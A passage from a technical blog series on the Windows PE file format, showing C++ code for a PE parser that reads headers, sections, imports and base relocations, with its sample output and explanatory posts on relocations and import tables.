	PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT = PEFILE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE = PEFILE_NT_HEADERS.OptionalHeader.BaseOfCode;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE = PEFILE_NT_HEADERS.OptionalHeader.ImageBase;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT = PEFILE_NT_HEADERS.OptionalHeader.SectionAlignment;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT = PEFILE_NT_HEADERS.OptionalHeader.FileAlignment;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE = PEFILE_NT_HEADERS.OptionalHeader.SizeOfImage;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS = PEFILE_NT_HEADERS.OptionalHeader.SizeOfHeaders;

	PEFILE_EXPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_EXPORT];
	PEFILE_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_IMPORT];
	PEFILE_RESOURCE_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_RESOURCE];
	PEFILE_EXCEPTION_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_EXCEPTION];
	PEFILE_SECURITY_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_SECURITY];
	PEFILE_BASERELOC_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_BASERELOC];
	PEFILE_DEBUG_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_DEBUG];
	PEFILE_ARCHITECTURE_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_ARCHITECTURE];
	PEFILE_GLOBALPTR_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_GLOBALPTR];
	PEFILE_TLS_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_TLS];
	PEFILE_LOAD_CONFIG_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG];
	PEFILE_BOUND_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT];
	PEFILE_IAT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_IAT];
	PEFILE_DELAY_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT];
	PEFILE_COM_DESCRIPTOR_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR];

}

PrintNTHeadersInfo()

This function prints the data obtained from the File Header and the Optional Header, and for each Data Directory it prints its RVA and size.

void PE64FILE::PrintNTHeadersInfo() {
	
	printf(" NT HEADERS:\n");
	printf(" -----------\n\n");

	printf(" PE Signature: 0x%X\n", PEFILE_NT_HEADERS_SIGNATURE);

	printf("\n File Header:\n\n");
	printf("   Machine: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_MACHINE);
	printf("   Number of sections: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS);
	printf("   Size of optional header: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER);

	printf("\n Optional Header:\n\n");
	printf("   Magic: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC);
	printf("   Size of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE);
	printf("   Size of initialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA);
	printf("   Size of uninitialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA);
	printf("   Address of entry point: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT);
	printf("   RVA of start of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE);
	printf("   Desired image base: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE);
	printf("   Section alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT);
	printf("   File alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT);
	printf("   Size of image: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE);
	printf("   Size of headers: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS);

	printf("\n Data Directories:\n");
	printf("\n   * Export Directory:\n");
	printf("       RVA: 0x%X\n", PEFILE_EXPORT_DIRECTORY.VirtualAddress);
	printf("       Size: 0x%X\n", PEFILE_EXPORT_DIRECTORY.Size);
	.
	.
	[REDACTED]
	.
	.
	printf("\n   * COM Runtime Descriptor:\n");
	printf("       RVA: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.VirtualAddress);
	printf("       Size: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.Size);

}


Parsing Section Headers

ParseSectionHeaders()

This function starts by assigning the PEFILE_SECTION_HEADERS class member to a pointer to an IMAGE_SECTION_HEADER array of the count of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS.

Then it goes into a loop of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS iterations where in each iteration it changes the file offset to (e_lfanew + size of NT Headers + loop counter multiplied by the size of a section header) to reach the beginning of the next Section Header, then it reads the new Section Header and assigns it to the next element of PEFILE_SECTION_HEADERS.

void PE64FILE::ParseSectionHeaders() {
	
	PEFILE_SECTION_HEADERS = new ___IMAGE_SECTION_HEADER[PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS];
	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		int offset = (PEFILE_DOS_HEADER.e_lfanew + sizeof(PEFILE_NT_HEADERS)) + (i * ___IMAGE_SIZEOF_SECTION_HEADER);
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_SECTION_HEADERS[i], ___IMAGE_SIZEOF_SECTION_HEADER, 1, Ppefile);
	}

}

PrintSectionHeadersInfo()

This function loops over the Section Headers array (filled by ParseSectionHeaders()), and it prints information about each section.

void PE64FILE::PrintSectionHeadersInfo() {
	
	printf(" SECTION HEADERS:\n");
	printf(" ----------------\n\n");

	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		printf("   * %.8s:\n", PEFILE_SECTION_HEADERS[i].Name);
		printf("        VirtualAddress: 0x%X\n", PEFILE_SECTION_HEADERS[i].VirtualAddress);
		printf("        VirtualSize: 0x%X\n", PEFILE_SECTION_HEADERS[i].Misc.VirtualSize);
		printf("        PointerToRawData: 0x%X\n", PEFILE_SECTION_HEADERS[i].PointerToRawData);
		printf("        SizeOfRawData: 0x%X\n", PEFILE_SECTION_HEADERS[i].SizeOfRawData);
		printf("        Characteristics: 0x%X\n\n", PEFILE_SECTION_HEADERS[i].Characteristics);
	}

}


Parsing Imports

ParseImportDirectory()

To parse out the Import Directory Table we need to determine the count of IMAGE_IMPORT_DESCRIPTORs first.

This function starts by resolving the file offset of the Import Directory, then it goes into a loop where in each loop it keeps reading the next import descriptor.
In each iteration it checks if the descriptor has zeroed out values, if that is the case then we’ve reached the end of the Import Directory, so it breaks.
Otherwise it increments _import_directory_count and the loop continues.

After finding the size of the Import Directory, the function assigns the PEFILE_IMPORT_TABLE class member to a pointer to an IMAGE_IMPORT_DESCRIPTOR array of the count of _import_directory_count then goes into another loop similar to the one we’ve seen in ParseSectionHeaders() to parse out the import descriptors.

void PE64FILE::ParseImportDirectory() {
	
	DWORD _import_directory_address = resolve(PEFILE_IMPORT_DIRECTORY.VirtualAddress, locate(PEFILE_IMPORT_DIRECTORY.VirtualAddress));
	_import_directory_count = 0;

	while (true) {
		___IMAGE_IMPORT_DESCRIPTOR tmp;
		int offset = (_import_directory_count * sizeof(___IMAGE_IMPORT_DESCRIPTOR)) + _import_directory_address;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&tmp, sizeof(___IMAGE_IMPORT_DESCRIPTOR), 1, Ppefile);

		if (tmp.Name == 0x00000000 && tmp.FirstThunk == 0x00000000) {
			_import_directory_count -= 1;
			_import_directory_size = _import_directory_count * sizeof(___IMAGE_IMPORT_DESCRIPTOR);
			break;
		}

		_import_directory_count++;
	}

	PEFILE_IMPORT_TABLE = new ___IMAGE_IMPORT_DESCRIPTOR[_import_directory_count];

	for (int i = 0; i < _import_directory_count; i++) {
		int offset = (i * sizeof(___IMAGE_IMPORT_DESCRIPTOR)) + _import_directory_address;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_IMPORT_TABLE[i], sizeof(___IMAGE_IMPORT_DESCRIPTOR), 1, Ppefile);
	}

}

PrintImportTableInfo()

After obtaining the import descriptors, further parsing is needed to retrieve information about the imported functions.
This is done by the PrintImportTableInfo() function.

This function iterates over the import descriptors, and for each descriptor it resolves the file offset of the DLL name, retrieves the DLL name then prints it, it also prints the ILT RVA, the IAT RVA and whether the import is bound or not.

After that it resolves the file offset of the ILT then it parses out each ILT entry.
If the Ordinal/Name flag is set it prints the function ordinal, otherwise it prints the function name, the hint RVA and the hint.

If the ILT entry is zeroed out, the loop breaks and the next import descriptor parsing iteration starts.

We’ve discussed the details about this in the PE imports post.

void PE64FILE::PrintImportTableInfo() {
	
	printf(" IMPORT TABLE:\n");
	printf(" ----------------\n\n");

	for (int i = 0; i < _import_directory_count; i++) {
		DWORD NameAddr = resolve(PEFILE_IMPORT_TABLE[i].Name, locate(PEFILE_IMPORT_TABLE[i].Name));
		int NameSize = 0;

		while (true) {
			char tmp;
			fseek(Ppefile, (NameAddr + NameSize), SEEK_SET);
			fread(&tmp, sizeof(char), 1, Ppefile);

			if (tmp == 0x00) {
				break;
			}

			NameSize++;
		}

		char* Name = new char[NameSize + 2];
		fseek(Ppefile, NameAddr, SEEK_SET);
		fread(Name, (NameSize * sizeof(char)) + 1, 1, Ppefile);
		printf("   * %s:\n", Name);
		delete[] Name;

		printf("       ILT RVA: 0x%X\n", PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk);
		printf("       IAT RVA: 0x%X\n", PEFILE_IMPORT_TABLE[i].FirstThunk);

		if (PEFILE_IMPORT_TABLE[i].TimeDateStamp == 0) {
			printf("       Bound: FALSE\n");
		}
		else if (PEFILE_IMPORT_TABLE[i].TimeDateStamp == -1) {
			printf("       Bound: TRUE\n");
		}

		printf("\n");

		DWORD ILTAddr = resolve(PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk, locate(PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk));
		int entrycounter = 0;

		while (true) {

			ILT_ENTRY_64 entry;

			fseek(Ppefile, (ILTAddr + (entrycounter * sizeof(QWORD))), SEEK_SET);
			fread(&entry, sizeof(ILT_ENTRY_64), 1, Ppefile);

			BYTE flag = entry.ORDINAL_NAME_FLAG;
			DWORD HintRVA = 0x0;
			WORD ordinal = 0x0;

			if (flag == 0x0) {
				HintRVA = entry.FIELD_2.HINT_NAME_TABE;
			}
			else if (flag == 0x01) {
				ordinal = entry.FIELD_2.ORDINAL;
			}

			if (flag == 0x0 && HintRVA == 0x0 && ordinal == 0x0) {
				break;
			}

			printf("\n       Entry:\n");

			if (flag == 0x0) {
				___IMAGE_IMPORT_BY_NAME hint;

				DWORD HintAddr = resolve(HintRVA, locate(HintRVA));
				fseek(Ppefile, HintAddr, SEEK_SET);
				fread(&hint, sizeof(___IMAGE_IMPORT_BY_NAME), 1, Ppefile);
				printf("         Name: %s\n", hint.Name);
				printf("         Hint RVA: 0x%X\n", HintRVA);
				printf("         Hint: 0x%X\n", hint.Hint);
			}
			else if (flag == 1) {
				printf("         Ordinal: 0x%X\n", ordinal);
			}

			entrycounter++;
		}

		printf("\n   ----------------------\n\n");

	}

}


Parsing Base Relocations

ParseBaseReloc()

This function follows the same process we’ve seen in ParseImportDirectory().
It resolves the file offset of the Base Relocation Directory, then it loops over each relocation block until it reaches a zeroed out block. Then it parses out these blocks and saves each IMAGE_BASE_RELOCATION structure in PEFILE_BASERELOC_TABLE.
One thing to note here that is different from what we’ve seen in ParseImportDirectory() is that in addition to keeping a block counter we also keep a size counter that’s incremented by adding the value of SizeOfBlock of each block in each iteration.
We do this because relocation blocks don’t have a fixed size, and in order to correctly calculate the offset of the next relocation block we need the total size of the previous blocks.

void PE64FILE::ParseBaseReloc() {
	
	DWORD _basereloc_directory_address = resolve(PEFILE_BASERELOC_DIRECTORY.VirtualAddress, locate(PEFILE_BASERELOC_DIRECTORY.VirtualAddress));
	_basreloc_directory_count = 0;
	int _basereloc_size_counter = 0;

	while (true) {
		___IMAGE_BASE_RELOCATION tmp;

		int offset = (_basereloc_size_counter + _basereloc_directory_address);

		fseek(Ppefile, offset, SEEK_SET);
		fread(&tmp, sizeof(___IMAGE_BASE_RELOCATION), 1, Ppefile);

		if (tmp.VirtualAddress == 0x00000000 &&
			tmp.SizeOfBlock == 0x00000000) {
			break;
		}

		_basreloc_directory_count++;
		_basereloc_size_counter += tmp.SizeOfBlock;
	}

	PEFILE_BASERELOC_TABLE = new ___IMAGE_BASE_RELOCATION[_basreloc_directory_count];

	_basereloc_size_counter = 0;

	for (int i = 0; i < _basreloc_directory_count; i++) {
		int offset = _basereloc_directory_address + _basereloc_size_counter;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_BASERELOC_TABLE[i], sizeof(___IMAGE_BASE_RELOCATION), 1, Ppefile);
		_basereloc_size_counter += PEFILE_BASERELOC_TABLE[i].SizeOfBlock;
	}

}

PrintBaseRelocationInfo()

This function iterates over the base relocation blocks, and for each block it resolves the file offset of the block, then it prints the block RVA, size and number of entries (calculated by subtracting the size of IMAGE_BASE_RELOCATION from the block size then dividing that by the size of a WORD).
After that it iterates over the relocation entries and prints the relocation value, and from that value it separates the type and the offset and prints each one of them.

We’ve discussed the details about this in the PE base relocations post.

void PE64FILE::PrintBaseRelocationsInfo() {
	
	printf(" BASE RELOCATIONS TABLE:\n");
	printf(" -----------------------\n");

	int szCounter = sizeof(___IMAGE_BASE_RELOCATION);

	for (int i = 0; i < _basreloc_directory_count; i++) {

		DWORD PAGERVA, BLOCKSIZE, BASE_RELOC_ADDR;
		int ENTRIES;

		BASE_RELOC_ADDR = resolve(PEFILE_BASERELOC_DIRECTORY.VirtualAddress, locate(PEFILE_BASERELOC_DIRECTORY.VirtualAddress));
		PAGERVA = PEFILE_BASERELOC_TABLE[i].VirtualAddress;
		BLOCKSIZE = PEFILE_BASERELOC_TABLE[i].SizeOfBlock;
		ENTRIES = (BLOCKSIZE - sizeof(___IMAGE_BASE_RELOCATION)) / sizeof(WORD);

		printf("\n   Block 0x%X: \n", i);
		printf("     Page RVA: 0x%X\n", PAGERVA);
		printf("     Block size: 0x%X\n", BLOCKSIZE);
		printf("     Number of entries: 0x%X\n", ENTRIES);
		printf("\n     Entries:\n");

		for (int i = 0; i < ENTRIES; i++) {

			BASE_RELOC_ENTRY entry;

			int offset = (BASE_RELOC_ADDR + szCounter + (i * sizeof(WORD)));

			fseek(Ppefile, offset, SEEK_SET);
			fread(&entry, sizeof(WORD), 1, Ppefile);

			printf("\n       * Value: 0x%X\n", entry);
			printf("         Relocation Type: 0x%X\n", entry.TYPE);
			printf("         Offset: 0x%X\n", entry.OFFSET);

		}
		printf("\n   ----------------------\n\n");
		szCounter += BLOCKSIZE;
	}

}


Conclusion

Here’s the full output after running the parser on a file:

Desktop>.\PE-Parser.exe .\SimpleApp64.exe


 FILE: .\SimpleApp64.exe
 TYPE: 0x20B (PE32+)

 ----------------------------------

 DOS HEADER:
 -----------

 Magic: 0x5A4D
 File address of new exe header: 0x100

 ----------------------------------

 RICH HEADER:
 ------------

 0x7809 0x93 0xA: 30729.147.10
 0x6FCB 0x101 0x2: 28619.257.2
 0x6FCB 0x105 0x11: 28619.261.17
 0x6FCB 0x104 0xA: 28619.260.10
 0x6FCB 0x103 0x3: 28619.259.3
 0x685B 0x101 0x5: 26715.257.5
 0x0 0x1 0x30: 0.1.48
 0x7086 0x109 0x1: 28806.265.1
 0x7086 0xFF 0x1: 28806.255.1
 0x7086 0x102 0x1: 28806.258.1

 ----------------------------------

 NT HEADERS:
 -----------

 PE Signature: 0x4550

 File Header:

   Machine: 0x8664
   Number of sections: 0x6
   Size of optional header: 0xF0

 Optional Header:

   Magic: 0x20B
   Size of code section: 0xE00
   Size of initialized data: 0x1E00
   Size of uninitialized data: 0x0
   Address of entry point: 0x12C4
   RVA of start of code section: 0x1000
   Desired image base: 0x40000000
   Section alignment: 0x1000
   File alignment: 0x200
   Size of image: 0x7000
   Size of headers: 0x400

 Data Directories:

   * Export Directory:
       RVA: 0x0
       Size: 0x0

   * Import Directory:
       RVA: 0x27AC
       Size: 0xB4

   * Resource Directory:
       RVA: 0x5000
       Size: 0x1E0

   * Exception Directory:
       RVA: 0x4000
       Size: 0x168

   * Security Directory:
       RVA: 0x0
       Size: 0x0

   * Base Relocation Table:
       RVA: 0x6000
       Size: 0x28

   * Debug Directory:
       RVA: 0x2248
       Size: 0x70

   * Architecture Specific Data:
       RVA: 0x0
       Size: 0x0

   * RVA of GlobalPtr:
       RVA: 0x0
       Size: 0x0

   * TLS Directory:
       RVA: 0x0
       Size: 0x0

   * Load Configuration Directory:
       RVA: 0x22C0
       Size: 0x130

   * Bound Import Directory:
       RVA: 0x0
       Size: 0x0

   * Import Address Table:
       RVA: 0x2000
       Size: 0x198

   * Delay Load Import Descriptors:
       RVA: 0x0
       Size: 0x0

   * COM Runtime Descriptor:
       RVA: 0x0
       Size: 0x0

 ----------------------------------

 SECTION HEADERS:
 ----------------

   * .text:
        VirtualAddress: 0x1000
        VirtualSize: 0xD2C
        PointerToRawData: 0x400
        SizeOfRawData: 0xE00
        Characteristics: 0x60000020

   * .rdata:
        VirtualAddress: 0x2000
        VirtualSize: 0xE3C
        PointerToRawData: 0x1200
        SizeOfRawData: 0x1000
        Characteristics: 0x40000040

   * .data:
        VirtualAddress: 0x3000
        VirtualSize: 0x638
        PointerToRawData: 0x2200
        SizeOfRawData: 0x200
        Characteristics: 0xC0000040

   * .pdata:
        VirtualAddress: 0x4000
        VirtualSize: 0x168
        PointerToRawData: 0x2400
        SizeOfRawData: 0x200
        Characteristics: 0x40000040

   * .rsrc:
        VirtualAddress: 0x5000
        VirtualSize: 0x1E0
        PointerToRawData: 0x2600
        SizeOfRawData: 0x200
        Characteristics: 0x40000040

   * .reloc:
        VirtualAddress: 0x6000
        VirtualSize: 0x28
        PointerToRawData: 0x2800
        SizeOfRawData: 0x200
        Characteristics: 0x42000040


 ----------------------------------

 IMPORT TABLE:
 ----------------

   * USER32.dll:
       ILT RVA: 0x28E0
       IAT RVA: 0x2080
       Bound: FALSE


       Entry:
         Name: MessageBoxA
         Hint RVA: 0x29F8
         Hint: 0x283

   ----------------------

   * VCRUNTIME140.dll:
       ILT RVA: 0x28F0
       IAT RVA: 0x2090
       Bound: FALSE


       Entry:
         Name: memset
         Hint RVA: 0x2A5E
         Hint: 0x3E

       Entry:
         Name: __current_exception_context
         Hint RVA: 0x2A40
         Hint: 0x1C

       Entry:
         Name: __current_exception
         Hint RVA: 0x2A2A
         Hint: 0x1B

       Entry:
         Name: __C_specific_handler
         Hint RVA: 0x2A12
         Hint: 0x8

   ----------------------

   * api-ms-win-crt-runtime-l1-1-0.dll:
       ILT RVA: 0x2948
       IAT RVA: 0x20E8
       Bound: FALSE


       Entry:
         Name: _crt_atexit
         Hint RVA: 0x2C12
         Hint: 0x1E

       Entry:
         Name: terminate
         Hint RVA: 0x2C20
         Hint: 0x67

       Entry:
         Name: _exit
         Hint RVA: 0x2B30
         Hint: 0x23

       Entry:
         Name: _register_thread_local_exe_atexit_callback
         Hint RVA: 0x2B76
         Hint: 0x3D

       Entry:
         Name: _c_exit
         Hint RVA: 0x2B6C
         Hint: 0x15

       Entry:
         Name: exit
         Hint RVA: 0x2B28
         Hint: 0x55

       Entry:
         Name: _initterm_e
         Hint RVA: 0x2B1A
         Hint: 0x37

       Entry:
         Name: _initterm
         Hint RVA: 0x2B0E
         Hint: 0x36

       Entry:
         Name: _get_initial_narrow_environment
         Hint RVA: 0x2AEC
         Hint: 0x28

       Entry:
         Name: _initialize_narrow_environment
         Hint RVA: 0x2ACA
         Hint: 0x33

       Entry:
         Name: _configure_narrow_argv
         Hint RVA: 0x2AB0
         Hint: 0x18

       Entry:
         Name: _initialize_onexit_table
         Hint RVA: 0x2BDA
         Hint: 0x34

       Entry:
         Name: _set_app_type
         Hint RVA: 0x2A8C
         Hint: 0x42

       Entry:
         Name: _seh_filter_exe
         Hint RVA: 0x2A7A
         Hint: 0x40

       Entry:
         Name: _cexit
         Hint RVA: 0x2B62
         Hint: 0x16

       Entry:
         Name: __p___argv
         Hint RVA: 0x2B54
         Hint: 0x5

       Entry:
         Name: __p___argc
         Hint RVA: 0x2B46
         Hint: 0x4

       Entry:
         Name: _register_onexit_function
         Hint RVA: 0x2BF6
         Hint: 0x3C

   ----------------------

   * api-ms-win-crt-math-l1-1-0.dll:
       ILT RVA: 0x2938
       IAT RVA: 0x20D8
       Bound: FALSE


       Entry:
         Name: __setusermatherr
         Hint RVA: 0x2A9C
         Hint: 0x9

   ----------------------

   * api-ms-win-crt-stdio-l1-1-0.dll:
       ILT RVA: 0x29E0
       IAT RVA: 0x2180
       Bound: FALSE


       Entry:
         Name: __p__commode
         Hint RVA: 0x2BCA
         Hint: 0x1

       Entry:
         Name: _set_fmode
         Hint RVA: 0x2B38
         Hint: 0x54

   ----------------------

   * api-ms-win-crt-locale-l1-1-0.dll:
       ILT RVA: 0x2928
       IAT RVA: 0x20C8
       Bound: FALSE


       Entry:
         Name: _configthreadlocale
         Hint RVA: 0x2BA4
         Hint: 0x8

   ----------------------

   * api-ms-win-crt-heap-l1-1-0.dll:
       ILT RVA: 0x2918
       IAT RVA: 0x20B8
       Bound: FALSE


       Entry:
         Name: _set_new_mode
         Hint RVA: 0x2BBA
         Hint: 0x16

   ----------------------


 ----------------------------------

 BASE RELOCATIONS TABLE:
 -----------------------

   Block 0x0:
     Page RVA: 0x2000
     Block size: 0x28
     Number of entries: 0x10

     Entries:

       * Value: 0xA198
         Relocation Type: 0xA
         Offset: 0x198

       * Value: 0xA1A0
         Relocation Type: 0xA
         Offset: 0x1A0

       * Value: 0xA1A8
         Relocation Type: 0xA
         Offset: 0x1A8

       * Value: 0xA1B0
         Relocation Type: 0xA
         Offset: 0x1B0

       * Value: 0xA1B8
         Relocation Type: 0xA
         Offset: 0x1B8

       * Value: 0xA1C8
         Relocation Type: 0xA
         Offset: 0x1C8

       * Value: 0xA1E0
         Relocation Type: 0xA
         Offset: 0x1E0

       * Value: 0xA1E8
         Relocation Type: 0xA
         Offset: 0x1E8

       * Value: 0xA220
         Relocation Type: 0xA
         Offset: 0x220

       * Value: 0xA228
         Relocation Type: 0xA
         Offset: 0x228

       * Value: 0xA318
         Relocation Type: 0xA
         Offset: 0x318

       * Value: 0xA330
         Relocation Type: 0xA
         Offset: 0x330

       * Value: 0xA338
         Relocation Type: 0xA
         Offset: 0x338

       * Value: 0xA3D8
         Relocation Type: 0xA
         Offset: 0x3D8

       * Value: 0xA3E0
         Relocation Type: 0xA
         Offset: 0x3E0

       * Value: 0xA3E8
         Relocation Type: 0xA
         Offset: 0x3E8

   ----------------------


 ----------------------------------

I hope that seeing actual code has given you a better understanding of what we’ve discussed throughout the previous posts.
I believe that there are better ways for implementation than the ones I have presented, I’m in no way a c++ programmer and I know that there’s always room for improvement, so feel free to reach out to me, any feedback would be much appreciated.

Thanks for reading.

A dive into the PE file format - PE file structure - Part 6: PE Base Relocations

By: 0xRick
28 October 2021 at 15:00

A dive into the PE file format - PE file structure - Part 6: PE Base Relocations

Introduction

In this post we’re going to talk about PE base relocations. We’re going to discuss what relocations are, then we’ll take a look at the relocation table.


Relocations

When a program is compiled, the compiler assumes that the executable is going to be loaded at a certain base address, that address is saved in IMAGE_OPTIONAL_HEADER.ImageBase, some addresses get calculated then hardcoded within the executable based on the base address.
However for a variety of reasons, it’s not very likely that the executable is going to get its desired base address, it will get loaded in another base address and that will make all of the hardcoded addresses invalid.
A list of all hardcoded values that will need fixing if the image is loaded at a different base address is saved in a special table called the Relocation Table (a Data Directory within the .reloc section). The process of relocating (done by the loader) is what fixes these values.

Let’s take an example, the following code defines an int variable and a pointer to that variable:

int test = 2;
int* testPtr = &test;

During compile-time, the compiler will assume a base address, let’s say it assumes a base address of 0x1000, it decides that test will be located at an offset of 0x100 and based on that it gives testPtr a value of 0x1100.
Later on, a user runs the program and the image gets loaded into memory.
It gets a base address of 0x2000, this means that the hardcoded value of testPtr will be invalid, the loader fixes that value by adding the difference between the assumed base address and the actual base address, in this case it’s a difference of 0x1000 (0x2000 - 0x1000), so the new value of testPtr will be 0x2100 (0x1100 + 0x1000) which is the correct new address of test.


Relocation Table

As described by Microsoft documentation, the base relocation table contains entries for all base relocations in the image.

It’s a Data Directory located within the .reloc section, it’s divided into blocks, each block represents the base relocations for a 4K page and each block must start on a 32-bit boundary.

Each block starts with an IMAGE_BASE_RELOCATION structure followed by any number of offset field entries.

The IMAGE_BASE_RELOCATION structure specifies the page RVA, and the size of the relocation block.

typedef struct _IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
} IMAGE_BASE_RELOCATION;
typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION;

Each offset field entry is a WORD, first 4 bits of it define the relocation type (check Microsoft documentation for a list of relocation types), the last 12 bits store an offset from the RVA specified in the IMAGE_BASE_RELOCATION structure at the start of the relocation block.

Each relocation entry gets processed by adding the RVA of the page to the image base address, then by adding the offset specified in the relocation entry, an absolute address of the location that needs fixing can be obtained.

The PE file I’m looking at contains only one relocation block, its size is 0x28 bytes:

We know that each block starts with an 8-byte-long structure, meaning that the size of the entries is 0x20 bytes (32 bytes), each entry’s size is 2 bytes so the total number of entries should be 16.


Conclusion

That’s all.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, IAT)

By: 0xRick
28 October 2021 at 01:00

A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, IAT)

Introduction

In this post we’re going to talk about a very important aspect of PE files, the PE imports. To understand how PE files handle their imports, we’ll go over some of the Data Directories present in the Import Data section (.idata), the Import Directory Table, the Import Lookup Table (ILT) or also referred to as the Import Name Table (INT) and the Import Address Table (IAT).


Import Directory Table

The Import Directory Table is a Data Directory located at the beginning of the .idata section.

It consists of an array of IMAGE_IMPORT_DESCRIPTOR structures, each one of them is for a DLL.
It doesn’t have a fixed size, so the last IMAGE_IMPORT_DESCRIPTOR of the array is zeroed-out (NULL-Padded) to indicate the end of the Import Directory Table.

IMAGE_IMPORT_DESCRIPTOR is defined as follows:

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;
  • OriginalFirstThunk: RVA of the ILT.
  • TimeDateStamp: A time date stamp, that’s initially set to 0 if not bound and set to -1 if bound.
    In case of an unbound import the time date stamp gets updated to the time date stamp of the DLL after the image is bound.
    In case of a bound import it stays set to -1 and the real time date stamp of the DLL can be found in the Bound Import Directory Table in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR .
    We’ll discuss bound imports in the next section.
  • ForwarderChain: The index of the first forwarder chain reference.
    This is something responsible for DLL forwarding. (DLL forwarding is when a DLL forwards some of its exported functions to another DLL.)
  • Name: An RVA of an ASCII string that contains the name of the imported DLL.
  • FirstThunk: RVA of the IAT.

Bound Imports

A bound import essentially means that the import table contains fixed addresses for the imported functions.
These addresses are calculated and written during compile time by the linker.

Using bound imports is a speed optimization, it reduces the time needed by the loader to resolve function addresses and fill the IAT, however if at run-time the bound addresses do not match the real ones then the loader will have to resolve these addresses again and fix the IAT.

